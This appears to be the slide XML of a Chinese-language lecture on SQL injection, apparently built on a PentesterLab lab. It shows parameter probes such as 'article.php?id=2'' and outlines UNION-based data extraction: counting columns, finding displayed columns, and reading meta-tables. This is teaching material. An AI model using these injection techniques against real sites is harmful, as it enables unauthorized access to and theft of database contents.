        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039190" y="5883275"/>
            <a:ext cx="5184433"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 [WIKIPEDIA SQL injection]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	https://en.wikipedia.org/wiki/SQL_injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301416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11" y="2037884"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>实验举例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2661313" y="4016198"/>
            <a:ext cx="8378960" cy="984885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>实验过程参考自：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pentesterlab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> course]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>://pentesterlab.com/exercises/from_sqli_to_shell/course</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{529B86CC-86F0-4D9D-9391-B8C947B5BF4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303088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53" y="309604"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>指纹收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>通过浏览器自带的开发者工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="内容占位符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16479" y="1905781"/>
            <a:ext cx="10831997" cy="4295587"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84177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53" y="309604"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>指纹收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>通过浏览器自带的开发者工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>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134637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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>嗅</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>探</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>猜想</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器上脚本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>整型参数试探</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>article.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=2'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  如果报错语法错误，说明存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>article.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=2-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存在漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符型参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>   将报错</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报错</a:t>
            </a:r>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111990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509640"/>
            <a:ext cx="10698004" cy="4468079"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>UNION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是将两个查询语句的结果合并起来。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接的两个查询结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询语句的前面部分我们无法修改，因为这些是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的代码。然而，我们可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尝试其它表格的信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>开发：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	a.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>试探出列的数量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	b.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>找出显示的列</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	c.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尝试出数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>meta-tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中的信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	d.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尝试出其它数据库或表中的信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320175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4331602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>两种方法可以试出列的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>数量：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>列的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>数量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>ORDER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>BY</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"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18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3260897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583140"/>
            <a:ext cx="10698004" cy="4558353"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>①使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>并增加列的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>id,name,price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> FROM articles where id=1</a:t>
            </a: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1,2,3——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>没有</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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句并增加列数。如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句连接的两个查询返回的列数不同，数据库会报错。因此可以通过这个方法来猜测列数 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注：这个是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MYSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方法理论，与其它数据库可能不同。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1,2,3……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以换成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>null,null,null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>两端的字段类型需要一致（或兼容）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152953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dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
